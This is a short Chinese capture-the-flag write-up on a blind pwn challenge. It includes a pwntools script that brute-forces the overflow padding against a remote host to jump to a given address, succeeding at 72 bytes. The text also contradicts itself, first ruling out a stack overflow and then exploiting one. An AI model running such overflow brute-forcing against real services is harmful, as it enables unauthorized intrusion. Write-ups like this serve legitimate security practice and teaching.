0x00:前言
這道題是盲打題,就是沒有給附件,只給了遠程環境,
但這道題并不難,由于這種形式少見,所以我就在這里記錄一下,
下面看看我的做題思路吧~
0x01:做題思路
1、初覽
題目并沒有給附件,這時候就可以做好盲打的準備了,
2、連接遠程并分析
用nc連接一下遠程:
給了一個地址,0x40060d,看地址是個64位的程式,給了一個地址,大膽猜測是get_shell或者是cat_flag相關的,然后我們可以操作的是輸入資料,回車也沒有任何回傳值,這也可以排除堆疊溢位,
3、撰寫exp
from pwn import * sys = 0x40060d for i in range(100): print(i) try: io = remote("111.200.241.244",53599) payload = b'A'*i + p64(sys) io.recvuntil(">") io.sendline(payload) print(io.recv()) io.interactive() except: io.close()
從0到99依次嘗試,判斷溢位所需長度,
在長度為72時,列印出了flag:
注意,這里要用try……except結構處理例外,不然就會報錯導致退出執行:
tolele
2022-07-02
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/498798.html
標籤:訊息安全
上一篇:攻防世界pwn題:Recho